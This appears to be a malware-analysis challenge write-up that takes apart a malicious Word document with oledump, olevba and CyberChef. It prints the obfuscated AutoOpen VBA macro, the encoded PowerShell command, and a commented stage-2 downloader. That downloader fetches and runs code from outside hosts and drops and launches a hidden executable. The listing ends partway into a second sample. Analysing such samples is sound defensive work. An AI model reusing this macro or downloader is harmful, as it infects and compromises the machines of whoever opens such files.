Squid Game
└─$ ./oledump.py attacker1.doc
1: 114 '\x01CompObj'
2: 4096 '\x05DocumentSummaryInformation'
3: 4096 '\x05SummaryInformation'
4: 13859 '1Table'
5: 33430 'Data'
6: 365 'Macros/PROJECT'
7: 41 'Macros/PROJECTwm'
8: M 9852 'Macros/VBA/ThisDocument'
9: 5460 'Macros/VBA/_VBA_PROJECT'
10: 513 'Macros/VBA/dir'
11: 306 'MsoDataStore/ÇYÕXGNÎÕÃUKWÛÎIS2BKÍÐÐ==/Item'
12: 341 'MsoDataStore/ÇYÕXGNÎÕÃUKWÛÎIS2BKÍÐÐ==/Properties'
13: 4096 'WordDocument'
└─$ ./oledump.py attacker1.doc -s 8 -v
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
' Runs automatically when Word opens the document (olevba flags AutoOpen as AutoExec).
' Net effect: one hidden "cmd /C <payload>" launch (see the VBA.Shell line below); everything
' else in this routine is padding.
' Errors are suppressed so the never-assigned variables used in the padding lines (Empty Variants)
' and any failed Shapes() lookup do not abort the macro.
On Error Resume Next
' Padding: each of these lines stores a throw-away value built from an unassigned variable,
' CBool() of a constant and Len()/LenB() of a random literal. None of the results is read
' again; they only bloat the routine and break naive signature matching.
DBvbDlfxWGXm = WifblkBfDS + CBool(2243) + Len(ChrW(5 + 9) + ChrW(3)) + LenB(Trim("QHSiqJpWNfHbmnlvPbbP")) + Len(lZlRjJlQKnBntw)
lQbWzTrJtfhGiaS = pWNDRZbLZdGgl + CBool(5015) + Len(ChrW(1 + 1) + ChrW(2)) + LenB(Trim("XkBMzwHsSZswNPQMBDL")) + Len(SxZnBTiJkRBD)
tcZwqHFss = zTQlVkgJtJHVH + CBool(6903) + Len(ChrW(6 + 4) + ChrW(10)) + LenB(Trim("jDxtDndtrsCpNSNkxdJzhj")) + Len(RRdTnGKKsvm)
qDRjdabdvLvw = bDhgcvpVdcXNV + CBool(6163) + Len(ChrW(2 + 7) + ChrW(10)) + LenB(Trim("TisXGlccaikddjLpXZhn")) + Len(hVXaKsWdqGRalHZ)
TJgSBgQcFDq = xHtTibzqdL + CBool(6499) + Len(ChrW(2 + 7) + ChrW(1)) + LenB(Trim("iFvxjMCgcVJTWgGHG")) + Len(aQkXvbNzGWvh)
GWGjfdpJrxkg = PfFKPmwSmLwNT + CBool(2009) + Len(ChrW(4 + 7) + ChrW(6)) + LenB(Trim("kdHfDqVfHbpXcWBalpBj")) + Len(jwrLSVvTGmNgSNh)
CCvSPPJWbrLcHS = ""
fhjjZvgrrjq = mFGCJxVWBXjkl + CBool(1344) + Len(ChrW(8 + 10) + ChrW(3)) + LenB(Trim("bTZapLhFkwRKZPK")) + Len(SWsFlrFhBaHlgGg)
' rjvFRbqzLtkzn, SKKdjMpgJRQRK, hdNxDVBxCTqQTpB, RJzJQGRzrc and CWflqnrJbKVBj are all empty
' strings; they are concatenated into the Shell command line purely to fragment it.
rjvFRbqzLtkzn = "" + ""
GnxslaCGaT = qqmRcwgpqlk + CBool(6041) + Len(ChrW(1 + 2) + ChrW(7)) + LenB(Trim("FvacXVVTqjKJxgdZjv")) + Len(QdRJwGnCHinZ)
xDgzRpPhghWrJL = NfHHmGCha + CBool(347) + Len(ChrW(3 + 10) + ChrW(10)) + LenB(Trim("QRgSjBfjthjpDkPxVpmDlb")) + Len(jWwMxvjadBtl)
tTRXtXmcgPrktFh = jdmzHVMkcVXcdMP + CBool(5783) + Len(ChrW(2 + 10) + ChrW(10)) + LenB(Trim("rnkhGPWpTBpGNcVlk")) + Len(irVHvSQQvHtd)
GhFdPWgpiqRj = CNLqTtpWDztqK + CBool(8793) + Len(ChrW(1 + 8) + ChrW(9)) + LenB(Trim("SXNhbQpQzmwVQlTmR")) + Len(RJaDmljLvpgjz)
LbZlvNQVaFtMi = vxPLFqFShhCqh + CBool(6141) + Len(ChrW(6 + 10) + ChrW(3)) + LenB(Trim("HahDZGNRJvHTcDKWPnnl")) + Len(zzfDDCMbPXrM)
SKKdjMpgJRQRK = "" + "" + Trim("")
ppBLnCMSjnSV = fPSQKCwZHRJ + CBool(6767) + Len(ChrW(6 + 9) + ChrW(3)) + LenB(Trim("cwZGhscSkqdkCDrjXnTS")) + Len(dmfMtsadBraSX)
pzSpxTNqbhCwW = DVsGkQJsLPQCcZqt + CBool(1865) + Len(ChrW(2 + 8) + ChrW(6)) + LenB(Trim("kZNsfRinpsRKqfNnF")) + Len(laLlSgkFRvtad)
JtnpWHTxSiiz = aCwfgTJDmbRQW + CBool(6925) + Len(ChrW(9 + 10) + ChrW(2)) + LenB(Trim("dDWBignPNFqBkrjqZlKiT")) + Len(chdsMqJKtKM)
QmrcNWGaSgCWz = lFQtNLhczCraQG + CBool(3980) + Len(ChrW(3 + 8) + ChrW(6)) + LenB(Trim("VKvjZliFSGsfCGKhSf")) + Len(KPgHQGtPqLTjphCn)
hdNxDVBxCTqQTpB = LTrim("")
nFtNXRVXbdFr = VPWjviWKBpJi + CBool(7052) + Len(ChrW(4 + 5) + ChrW(8)) + LenB(Trim("VBjjdfMslCcHNgbjJa")) + Len(nBDKwlZJvRMwRR)
gLkHkMNJpWGPiM = qcmPmHlmdWZqj + CBool(194) + Len(ChrW(7 + 5) + ChrW(1)) + LenB(Trim("ZTTXLrVxkWNKjjPrfCj")) + Len(crtmLCNraQLF)
zMzTwHmjJjndL = rDZKxGvDrNBJ + CBool(3433) + Len(ChrW(7 + 9) + ChrW(1)) + LenB(Trim("XaMLmrHxaSlqSXV")) + Len(ptlCjjDiKZ)
MNKsCVNXktg = hdJScJQgXmkm + CBool(2807) + Len(ChrW(7 + 5) + ChrW(9)) + LenB(Trim("RbRanmjXmLslKkZDlB")) + Len(WfkDLfGhqhWfhTN)
nHMgbFSzmgv = TBWHlimLMV + CBool(7832) + Len(ChrW(9 + 8) + ChrW(10)) + LenB(Trim("LsHkNQtMsMzltJgPQgfkR")) + Len(JHxRSZaqkRwtHi)
RJzJQGRzrc = ""
MCFxxPbQXmfGfnL = NsLSSSLGDfkwlt + CBool(5937) + Len(ChrW(6 + 9) + ChrW(3)) + LenB(Trim("SNpRVqvVcnPhX")) + Len(gJMqliiHCRNZQTc)
LdnJwgZjbnKqtaa = aBBZDWsTDPPnS + CBool(8258) + Len(ChrW(7 + 3) + ChrW(4)) + LenB(Trim("faLQCswVKLgWjmJKg")) + Len(KmpHBhFRwlKKMm)
FHvwQsqqdgbr = wtDvZMrVDatsPG + CBool(8557) + Len(ChrW(6 + 1) + ChrW(4)) + LenB(Trim("lDjJcSLdkCqGrRzwdlKHLVHn")) + Len(qlkRQRpBTtrm)
CiRSdXZHwV = NKxZvdzbPWxxN + CBool(1618) + Len(ChrW(10 + 4) + ChrW(4)) + LenB(Trim("pJRTVfBcDhxrcwKkPDbFt")) + Len(wKPlSJwvvXqW)
xVpspwsllZGqG = MpTBwVxXgdanm + CBool(5472) + Len(ChrW(1 + 3) + ChrW(5)) + LenB(Trim("KlilNHcTHfLXgQgkkRH")) + Len(tlWSglqmcgHrcq)
CWflqnrJbKVBj = RTrim("") + ""
kkCTbdBcJnsGw = sFdLzbirFimt + CBool(6092) + Len(ChrW(6 + 7) + ChrW(8)) + LenB(Trim("cvXVCvgQfdqkdZkQwadmPMg")) + Len(acSnFqKQZJkgq)
cGvRqkvVFLFzsK = mChrRcSmQTlzbtd + CBool(476) + Len(ChrW(5 + 5) + ChrW(9)) + LenB(Trim("iXZiMssZcgzrHZrcFvVtk")) + Len(iixsSRWTqT)
QwXhZsRSjsaLm = FracTilLgHn + CBool(590) + Len(ChrW(4 + 8) + ChrW(7)) + LenB(Trim("MNhhbMhpCpvcwlCCWRgfhFc")) + Len(igrKGJjKXXfr)
' The real payload is not in the VBA at all: it is the alternative text of the drawing shape
' named "h9mkae7" in the document body (the strings dump of the 1Table stream shows "h9mkae7"
' immediately followed by the caret-laced POWERSHELL command line).
Set pNHbvwXpnbZvS = Shapes(Trim("h9mkae7"))
dWDHaNGFDcG = iGKRcdzDwMZzqlWN + CBool(2417) + Len(ChrW(5 + 3) + ChrW(4)) + LenB(Trim("hDNlqMjmcDXrwkrDwq")) + Len(mQhXDqaHVLMab)
zVRvpZVSlZP = jxrRCZTpPSjqG + CBool(747) + Len(ChrW(9 + 2) + ChrW(3)) + LenB(Trim("wnkLGNvnwtBPGKxVMs")) + Len(HmbfaFbBPKWJstpW)
' Launch: "CmD /C " + shape text with every "[" restored to "A" (the base64 after -encodedcommand
' was stored with A -> [ so it is not valid base64 at rest). The "^" characters in the stored text
' are cmd.exe escape characters that cmd consumes when it parses the line, so "P^O^W^E^R^S^H^E^L^L"
' only becomes the real executable name at run time. Window style CInt(351 * 2 + -702) = 0 = vbHide.
VBA.Shell# "CmD /C " + Trim(rjvFRbqzLtkzn) + SKKdjMpgJRQRK + Trim(Replace(pNHbvwXpnbZvS.AlternativeText + "", "[", "A")) + hdNxDVBxCTqQTpB + RJzJQGRzrc + CWflqnrJbKVBj, CInt(351 * 2 + -702)
' More padding after the launch; nothing below has any effect.
lFbSwGcXvLj = ZcCmWkkqqB + CBool(3868) + Len(ChrW(10 + 10) + ChrW(7)) + LenB(Trim("GpsfXGHdXPiPBQWm")) + Len(CxtsBzHdKBGmb)
gQVFVamfZLZ = GgRgBdCqvLXk + CBool(260) + Len(ChrW(4 + 5) + ChrW(3)) + LenB(Trim("pSdvPiVsNHZWVbr")) + Len(ZxkaZVpVviNG)
XXDBdSGLmXrT = kkfQTPTJpjjs + CBool(9051) + Len(ChrW(4 + 6) + ChrW(1)) + LenB(Trim("RkTPBgXDhBTgMXtKSb")) + Len(bvfFxpHJWlX)
rhfWlBhJNxhXd = DbfBblNVjZrSd + CBool(7064) + Len(ChrW(10 + 10) + ChrW(6)) + LenB(Trim("MwstcPJvhangVNZapdZ")) + Len(jfPdPngPqkfl)
PrBtRSHfsVF = PDvGhnzPcxhD + CBool(1483) + Len(ChrW(5 + 8) + ChrW(1)) + LenB(Trim("tvjtZQfzHdgNNRHZqilSN")) + Len(JJLiShTtqxhXr)
fXsWigQMrcFc = mxpJbmSSQ + CBool(5222) + Len(ChrW(10 + 8) + ChrW(10)) + LenB(Trim("rdlmccJkfVhXRccQBM")) + Len(RkVtwCRbFKwknG)
dgDaZRkBlQp = MvZcVWwwaGt + CBool(5297) + Len(ChrW(4 + 6) + ChrW(5)) + LenB(Trim("VgBdpkxSLXdGbgLKh")) + Len(qNJnfcLpkQXcp)
wdTqKxXzraCs = mkaDKJfCfVRm + CBool(8379) + Len(ChrW(1 + 10) + ChrW(5)) + LenB(Trim("klTWfaFrtslwGtgadMj")) + Len(GvivfXcsHC)
End Sub
VBA.Shell# "CmD /C " + Trim(rjvFRbqzLtkzn) + SKKdjMpgJRQRK + Trim(Replace(pNHbvwXpnbZvS.AlternativeText + "", "[", "A")) + hdNxDVBxCTqQTpB + RJzJQGRzrc + CWflqnrJbKVBj, CInt(351 * 2 + -702)
lFbSwGcXvLj = ZcCmWkkqqB + CBool(3868) + Len(ChrW(10 + 10) + ChrW(7)) + LenB(Trim("GpsfXGHdXPiPBQWm")) + Len(CxtsBzHdKBGmb)
gQVFVamfZLZ = GgRgBdCqvLXk + CBool(260) + Len(ChrW(4 + 5) + ChrW(3)) + LenB(Trim("pSdvPiVsNHZWVbr")) + Len(ZxkaZVpVviNG)
└─$ ./oledump.py attacker1.doc -s 4 -S
[Content_Types].xml
_rels/.rels
theme/theme/themeManager.xml
sQ}#
theme/theme/theme1.xml
$O})
Xp90
+PHI|
9xu5
fs+W
VF7H
q=.
8}d-
qyI@
j!Q_
jyV`
|PZ+
O&x$
A8>v
;EUC
*~P(5
/,EE\}
theme/theme/_rels/themeManager.xml.rels
6?$Q
K(M&$R(.1
[Content_Types].xmlPK
_rels/.relsPK
theme/theme/themeManager.xmlPK
theme/theme/theme1.xmlPK
theme/theme/_rels/themeManager.xml.relsPK
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
Normal
Default Paragraph Font
Table Normal
No List
h9mkae7
P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand J[Bp[G4[cwB0[GE[bgBj[GU[I[[9[C[[WwBT[Hk[cwB0[GU[bQ[u[EE[YwB0[Gk[dgBh[HQ[bwBy[F0[Og[6[EM[cgBl[GE[d[Bl[Ek[bgBz[HQ[YQBu[GM[ZQ[o[CI[UwB5[HM[d[Bl[G0[LgBO[GU[d[[u[Fc[ZQBi[EM[b[Bp[GU[bgB0[CI[KQ[7[[0[Cg[k[G0[ZQB0[Gg[bwBk[C[[PQ[g[Fs[UwB5[HM[d[Bl[G0[LgBO[GU[d[[u[Fc[ZQBi[EM[b[Bp[GU[bgB0[F0[LgBH[GU[d[BN[GU[d[Bo[G8[Z[Bz[Cg[KQ[7[[0[CgBm[G8[cgBl[GE[YwBo[Cg[J[Bt[C[[aQBu[C[[J[Bt[GU[d[Bo[G8[Z[[p[Hs[DQ[K[[0[Cg[g[C[[aQBm[Cg[J[Bt[C4[TgBh[G0[ZQ[g[C0[ZQBx[C[[IgBE[G8[dwBu[Gw[bwBh[GQ[UwB0[HI[aQBu[Gc[Ig[p[Hs[DQ[K[C[[I[[g[C[[d[By[Hk[ew[N[[o[I[[g[C[[I[[g[CQ[dQBy[Gk[I[[9[C[[TgBl[Hc[LQBP[GI[agBl[GM[d[[g[FM[eQBz[HQ[ZQBt[C4[VQBy[Gk[K[[i[Gg[d[B0[H[[Og[v[C8[MQ[3[DY[Lg[z[DI[Lg[z[DU[Lg[x[DY[Lw[3[D[[N[Bl[C4[c[Bo[H[[Ig[p[[0[Cg[g[C[[I[[g[C[[SQBF[Fg[K[[k[G0[LgBJ[G4[dgBv[Gs[ZQ[o[CQ[aQBu[HM[d[Bh[G4[YwBl[Cw[I[[o[CQ[dQBy[Gk[KQ[p[Ck[Ow[N[[o[I[[g[C[[I[B9[GM[YQB0[GM[a[B7[H0[DQ[K[[0[Cg[g[C[[fQ[N[[o[DQ[K[C[[I[Bp[GY[K[[k[G0[LgBO[GE[bQBl[C[[LQBl[HE[I[[i[EQ[bwB3[G4[b[Bv[GE[Z[BE[GE[d[Bh[CI[KQB7[[0[Cg[g[C[[I[[g[C[[d[By[Hk[ew[N[[o[I[[g[C[[I[[g[CQ[dQBy[Gk[I[[9[C[[TgBl[Hc[LQBP[GI[agBl[GM[d[[g[FM[eQBz[HQ[ZQBt[C4[VQBy[Gk[K[[i[Gg[d[B0[H[[Og[v[C8[ZgBw[GU[d[By[GE[YQBy[GQ[ZQBs[Gw[YQ[u[GI[YQBu[GQ[LwB4[GE[c[Bf[DE[M[[y[GI[LQBB[Fo[MQ[v[Dc[M[[0[GU[LgBw[Gg[c[[/[Gw[PQBs[Gk[d[B0[GU[bg[0[C4[ZwBh[HM[Ig[p[[0[Cg[g[C[[I[[g[C[[J[By[GU[cwBw[G8[bgBz[GU[I[[9[C[[J[Bt[C4[SQBu[HY[bwBr[GU[K[[k[Gk[bgBz[HQ[YQBu[GM[ZQ[s[C[[K[[k[HU[cgBp[Ck[KQ[7[[0[Cg[N[[o[I[[g[C[[I[[g[CQ[c[Bh[HQ[a[[g[D0[I[Bb[FM[eQBz[HQ[ZQBt[C4[RQBu[HY[aQBy[G8[bgBt[GU[bgB0[F0[Og[6[Ec[ZQB0[EY[bwBs[GQ[ZQBy[F[[YQB0[Gg[K[[i[EM[bwBt[G0[bwBu[EE[c[Bw[Gw[aQBj[GE[d[Bp[G8[bgBE[GE[d[Bh[CI[KQ[g[Cs[I[[i[Fw[X[BR[GQ[WgBH[F[[LgBl[Hg[ZQ[i[Ds[DQ[K[C[[I[[g[C[[I[Bb[FM[eQBz[HQ[ZQBt[C4[SQBP[C4[RgBp[Gw[ZQBd[Do[OgBX[HI[aQB0[GU[QQBs[Gw[QgB5[HQ[ZQBz[Cg[J[Bw[GE[d[Bo[Cw[I[[k[HI[ZQBz[H[[bwBu[HM[ZQ[p[Ds[DQ[K[[0[Cg[g[C[[I[[g[C[[J[Bj[Gw[cwBp[GQ[I[[9[C[[TgBl[Hc[LQBP[GI[agBl[GM[d[[g[Ec[dQBp[GQ[I[[n[EM[M[[4[EE[RgBE[Dk[M[[t[EY[MgBB[D
E[LQ[x[DE[R[[x[C0[O[[0[DU[NQ[t[D[[M[BB[D[[Qw[5[DE[Rg[z[Dg[O[[w[Cc[DQ[K[C[[I[[g[C[[I[[k[HQ[eQBw[GU[I[[9[C[[WwBU[Hk[c[Bl[F0[Og[6[Ec[ZQB0[FQ[eQBw[GU[RgBy[G8[bQBD[Ew[UwBJ[EQ[K[[k[GM[b[Bz[Gk[Z[[p[[0[Cg[g[C[[I[[g[C[[J[Bv[GI[agBl[GM[d[[g[D0[I[Bb[EE[YwB0[Gk[dgBh[HQ[bwBy[F0[Og[6[EM[cgBl[GE[d[Bl[Ek[bgBz[HQ[YQBu[GM[ZQ[o[CQ[d[B5[H[[ZQ[p[[0[Cg[g[C[[I[[g[C[[J[Bv[GI[agBl[GM[d[[u[EQ[bwBj[HU[bQBl[G4[d[[u[EE[c[Bw[Gw[aQBj[GE[d[Bp[G8[bg[u[FM[a[Bl[Gw[b[BF[Hg[ZQBj[HU[d[Bl[Cg[J[Bw[GE[d[Bo[Cw[J[Bu[HU[b[[s[C[[J[Bu[HU[b[[s[C[[J[Bu[HU[b[[s[D[[KQ[N[[o[DQ[K[C[[I[[g[C[[I[B9[GM[YQB0[GM[a[B7[H0[DQ[K[C[[I[[g[C[[I[[N[[o[I[[g[H0[DQ[K[H0[DQ[K[[0[CgBF[Hg[aQB0[Ds[DQ[K[[0[Cg[=
ez97260_a
Ruben__702314
ez20760_a
Zora__315900
ez74530_a
Jarrod__619003
ez46492_a
Floyd__148063
ez80718_a
Taryn__106385
Project.ThisDocument.AutoOpen
PROJECT.THISDOCUMENT.AUTOOPEN
Unknown
Times New Roman
Symbol
Arial
Calibri
Cambria Math
Networked multi-state projection
West Virginia Samanta
213-446-1757 x7135
Windows
J[Bp[G4[cwB0[GE[bgBj[GU[I[[9[C[[WwBT[Hk[cwB0[GU[bQ[u[EE[YwB0[Gk[dgBh[HQ[bwBy[F0[Og[6[EM[cgBl[GE[d[Bl[Ek[bgBz[HQ[YQBu[GM[ZQ[o[CI[UwB5[HM[d[Bl[G0[LgBO[GU[d[[u[Fc[ZQBi[EM[b[Bp[GU[bgB0[CI[KQ[7[[0[Cg[k[G0[ZQB0[Gg[bwBk[C[[PQ[g[Fs[UwB5[HM[d[Bl[G0[LgBO[GU[d[[u[Fc[ZQBi[EM[b[Bp[GU[bgB0[F0[LgBH[GU[d[BN[GU[d[Bo[G8[Z[Bz[Cg[KQ[7[[0[CgBm[G8[cgBl[GE[YwBo[Cg[J[Bt[C[[aQBu[C[[J[Bt[GU[d[Bo[G8[Z[[p[Hs[DQ[K[[0[Cg[g[C[[aQBm[Cg[J[Bt[C4[TgBh[G0[ZQ[g[C0[ZQBx[C[[IgBE[G8[dwBu[Gw[bwBh[GQ[UwB0[HI[aQBu[Gc[Ig[p[Hs[DQ[K[C[[I[[g[C[[d[By[Hk[ew[N[[o[I[[g[C[[I[[g[CQ[dQBy[Gk[I[[9[C[[TgBl[Hc[LQBP[GI[agBl[GM[d[[g[FM[eQBz[HQ[ZQBt[C4[VQBy[Gk[K[[i[Gg[d[B0[H[[Og[v[C8[MQ[3[DY[Lg[z[DI[Lg[z[DU[Lg[x[DY[Lw[3[D[[N[Bl[C4[c[Bo[H[[Ig[p[[0[Cg[g[C[[I[[g[C[[SQBF[Fg[K[[k[G0[LgBJ[G4[dgBv[Gs[ZQ[o[CQ[aQBu[HM[d[Bh[G4[YwBl[Cw[I[[o[CQ[dQBy[Gk[KQ[p[Ck[Ow[N[[o[I[[g[C[[I[B9[GM[YQB0[GM[a[B7[H0[DQ[K[[0[Cg[g[C[[fQ[N[[o[DQ[K[C[[I[Bp[GY[K[[k[G0[LgBO[GE[bQBl[C[[LQBl[HE[I[[i[EQ[bwB3[G4[b[Bv[GE[Z[BE[GE[d[Bh[CI[KQB7[[0[Cg[g[C[[I[[g[C[[d[By[Hk[ew[N[[o[I[[g[C[[I[[g[CQ[dQBy[Gk[I[[9[C[[TgBl[Hc[LQBP[GI[agBl[GM[d[[g[FM[eQBz[HQ[ZQBt[C4[VQBy[Gk[K[[i[Gg[d[B0[H[[Og[v[C8[ZgBw[GU[d[By[GE[YQBy[GQ[ZQBs[Gw[YQ[u[GI[YQBu[GQ[LwB4[GE[c[Bf[DE[M[[y[GI[LQBB[Fo[MQ[v[Dc[M[[0[GU[LgBw[Gg[c[[/[Gw[PQBs[Gk[d[B0[GU[bg[0[C4[ZwBh[HM[Ig[p[[0[Cg[g[C[[I[[g[C[[J[By[GU[cwBw[G8[bgBz[GU[I[[9[C[[J[Bt[C4[SQBu[HY[bwBr[GU[K[[k[Gk[bgBz[HQ[YQBu[GM[ZQ[s[C[[K[[k[HU[cgBp[Ck[KQ[7[[0[Cg[N[[o[I[[g[C[[I[[g[CQ[c[Bh[HQ[a[[g[D0[I[Bb[FM[eQBz[HQ[ZQBt[C4[RQBu[HY[aQBy[G8[bgBt[GU[bgB0[F0[Og[6[Ec[ZQB0[EY[bwBs[GQ[ZQBy[F[[YQB0[Gg[K[[i[EM[bwBt[G0[bwBu[EE[c[Bw[Gw[aQBj[GE[d[Bp[G8[bgBE[GE[d[Bh[CI[KQ[g[Cs[I[[i[Fw[X[BR[GQ[WgBH[F[[LgBl[Hg[ZQ[i[Ds[DQ[K[C[[I[[g[C[[I[Bb[FM[eQBz[HQ[ZQBt[C4[SQBP[C4[RgBp[Gw[ZQBd[Do[OgBX[HI[aQB0[GU[QQBs[Gw[QgB5[HQ[ZQBz[Cg[J[Bw[GE[d[Bo[Cw[I[[k[HI[ZQBz[H[[bwBu[HM[ZQ[p[Ds[DQ[K[[0[Cg[g[C[[I[[g[C[[J[Bj[Gw[cwBp[GQ[I[[9[C[[TgBl[Hc[LQBP[GI[agBl[GM[d[[g[Ec[dQBp[GQ[I[[n[EM[M[[4[EE[RgBE[Dk[M[[t[EY[MgBB[DE[LQ[x[DE[R[[x[C0[O[[0[DU[NQ[t[D[[M[BB[D[[Qw[5[DE[Rg[z[Dg[O[[w[Cc[DQ[K[C[[I[[g[C[[I[[k[HQ[
eQBw[GU[I[[9[C[[WwBU[Hk[c[Bl[F0[Og[6[Ec[ZQB0[FQ[eQBw[GU[RgBy[G8[bQBD[Ew[UwBJ[EQ[K[[k[GM[b[Bz[Gk[Z[[p[[0[Cg[g[C[[I[[g[C[[J[Bv[GI[agBl[GM[d[[g[D0[I[Bb[EE[YwB0[Gk[dgBh[HQ[bwBy[F0[Og[6[EM[cgBl[GE[d[Bl[Ek[bgBz[HQ[YQBu[GM[ZQ[o[CQ[d[B5[H[[ZQ[p[[0[Cg[g[C[[I[[g[C[[J[Bv[GI[agBl[GM[d[[u[EQ[bwBj[HU[bQBl[G4[d[[u[EE[c[Bw[Gw[aQBj[GE[d[Bp[G8[bg[u[FM[a[Bl[Gw[b[BF[Hg[ZQBj[HU[d[Bl[Cg[J[Bw[GE[d[Bo[Cw[J[Bu[HU[b[[s[C[[J[Bu[HU[b[[s[C[[J[Bu[HU[b[[s[D[[KQ[N[[o[DQ[K[C[[I[[g[C[[I[B9[GM[YQB0[GM[a[B7[H0[DQ[K[C[[I[[g[C[[I[[N[[o[I[[g[H0[DQ[K[H0[DQ[K[[0[CgBF[Hg[aQB0[Ds[DQ[K[[0[Cg[=
In CyberChef, paste the base64 blob that follows `-encodedcommand` into the Input pane, then build the recipe from these operations:
- Find / Replace (simple string): replace `[` with `A`. This mirrors the `Replace(..., "[", "A")` the macro itself applies before calling Shell — `[` is not a base64 character, so the stored blob will not decode until it is put back.
- From Base64.
- Decode text (UTF-16LE). `-encodedcommand` expects base64 of a UTF-16LE string, which is why the raw decode comes out interleaved with null bytes; "Remove null bytes" gives the same readable result for an ASCII-only script, but the proper text decode is safer if a sample ever contains non-ASCII characters.
This shows us the de-obfuscated script:
# Stage 2 recovered from the macro's -encodedcommand blob (attacker1.doc).
# A WebClient is created and its download methods are located by reflection
# (GetMethods + name comparison) so "DownloadString"/"DownloadData" never appear
# as direct member calls in the script text.
$instance = [System.Activator]::CreateInstance("System.Net.WebClient");
$method = [System.Net.WebClient].GetMethods();
# Every public method, including every overload, is visited; there is no break, so both
# branches below are attempted and every failure (bad overload, network error, write
# error) is swallowed by the empty catch blocks.
foreach($m in $method){
if($m.Name -eq "DownloadString"){
try{
# Fileless branch: fetch text from the hard-coded IP and execute it in memory with IEX.
$uri = New-Object System.Uri("http://176.32.35.16/704e.php")
# Invoke with a Uri argument should only bind to the (Uri) overload; the (string) overload
# is expected to throw here and be ignored by the catch.
IEX($m.Invoke($instance, ($uri)));
}catch{}
}
if($m.Name -eq "DownloadData"){
try{
# File-drop branch: download raw bytes from the second host.
$uri = New-Object System.Uri("http://fpetraardella.band/xap_102b-AZ1/704e.php?l=litten4.gas")
$response = $m.Invoke($instance, ($uri));
# CommonApplicationData normally resolves to C:\ProgramData. PowerShell does not treat "\"
# as an escape, so the path literally ends in "\\QdZGP.exe"; Win32 tolerates the doubled separator.
$path = [System.Environment]::GetFolderPath("CommonApplicationData") + "\\QdZGP.exe";
[System.IO.File]::WriteAllBytes($path, $response);
# The dropped file is launched through a Shell COM object resolved from its CLSID rather than
# a ProgID. NOTE(review): this CLSID is commonly documented as ShellBrowserWindow; launching via
# its .Document.Application.ShellExecute presumably makes the new process a child of the COM
# server (explorer.exe) instead of powershell.exe -- confirm the parent PID in a sandbox.
$clsid = New-Object Guid 'C08AFD90-F2A1-11D1-8455-00A0C91F3880'
$type = [Type]::GetTypeFromCLSID($clsid)
$object = [Activator]::CreateInstance($type)
# Trailing 0 is the vShow argument of Shell.Application.ShellExecute: hidden window.
$object.Document.Application.ShellExecute($path,$nul, $nul, $nul,0)
}catch{}
}
}
Exit;
olevba attacker1.doc   (the listing below reproduces only the AutoOpen shell and olevba's keyword table; the full macro body is the one recovered above with `oledump.py -s 8 -v`)
olevba 0.60.2 on Python 3.13.7 - http://decalage.info/python/oletools
===============================================================================
FILE: attacker1.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: attacker1.doc - OLE stream: 'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub AutoOpen()
End Sub
+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|AutoExec |AutoOpen |Runs when the Word document is opened |
|Suspicious|Shell |May run an executable file or a system |
| | |command |
|Suspicious|ChrW |May attempt to obfuscate specific strings |
| | |(use option --deobf to deobfuscate) |
|Suspicious|Base64 Strings |Base64-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
+----------+--------------------+---------------------------------------------+
└─$ olemeta attacker1.doc
olemeta 0.54 - http://decalage.info/python/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues
===============================================================================
FILE: attacker1.doc
Properties from the SummaryInformation stream:
+---------------------+------------------------------+
|Property |Value |
+---------------------+------------------------------+
|codepage |1251 |
|title |Networked multi-state |
| |projection |
|subject |West Virginia Samanta |
|author |213-446-1757 x7135 |
|keywords | |
|comments |Re-contextualized radical |
| |service-desk |
|template |Normal |
|last_saved_by | Windows |
|revision_number |11 |
|total_edit_time |180 |
|create_time |2018-04-19 18:59:00 |
|last_saved_time |2019-02-07 23:45:00 |
|num_pages |1 |
|num_words |1 |
|num_chars |7 |
|creating_application |Microsoft Office Word |
|security |0 |
+---------------------+------------------------------+
Properties from the DocumentSummaryInformation stream:
+---------------------+------------------------------+
|Property |Value |
+---------------------+------------------------------+
|codepage_doc |1251 |
|bytes |23552 |
|lines |1 |
|paragraphs |1 |
|scale_crop |False |
|heading_pairs |[b'Title', 1, b'\xcd\xe0\xe7\x|
| |e2\xe0\xed\xe8\xe5', 1] |
|titles_of_parts |[b'', b''] |
|manager |Mr. Granville McGlynn |
|company |Grady-Adams Rusty McGlynn |
|links_dirty |False |
|chars_with_spaces |7 |
|shared_doc |False |
|hlinks_changed |False |
|version |1048576 |
+---------------------+------------------------------+
Attacker - 02
└─$ ./oledump.py attacker2.doc
1: 114 '\x01CompObj'
2: 4096 '\x05DocumentSummaryInformation'
3: 4096 '\x05SummaryInformation'
4: 7427 '1Table'
5: 63641 'Data'
6: 97 'Macros/Form/\x01CompObj'
7: 283 'Macros/Form/\x03VBFrame'
8: 63528 'Macros/Form/f'
9: 2220 'Macros/Form/o'
10: 566 'Macros/PROJECT'
11: 92 'Macros/PROJECTwm'
12: M 6655 'Macros/VBA/Form'
13: M 15671 'Macros/VBA/Module1'
14: M 1593 'Macros/VBA/ThisDocument'
15: 42465 'Macros/VBA/_VBA_PROJECT'
16: M 2724 'Macros/VBA/bxh'
17: 1226 'Macros/VBA/dir'
18: 4096 'WordDocument'
└─$ ./oledump.py attacker2.doc -i
1: 114 '\x01CompObj'
2: 4096 '\x05DocumentSummaryInformation'
3: 4096 '\x05SummaryInformation'
4: 7427 '1Table'
5: 63641 'Data'
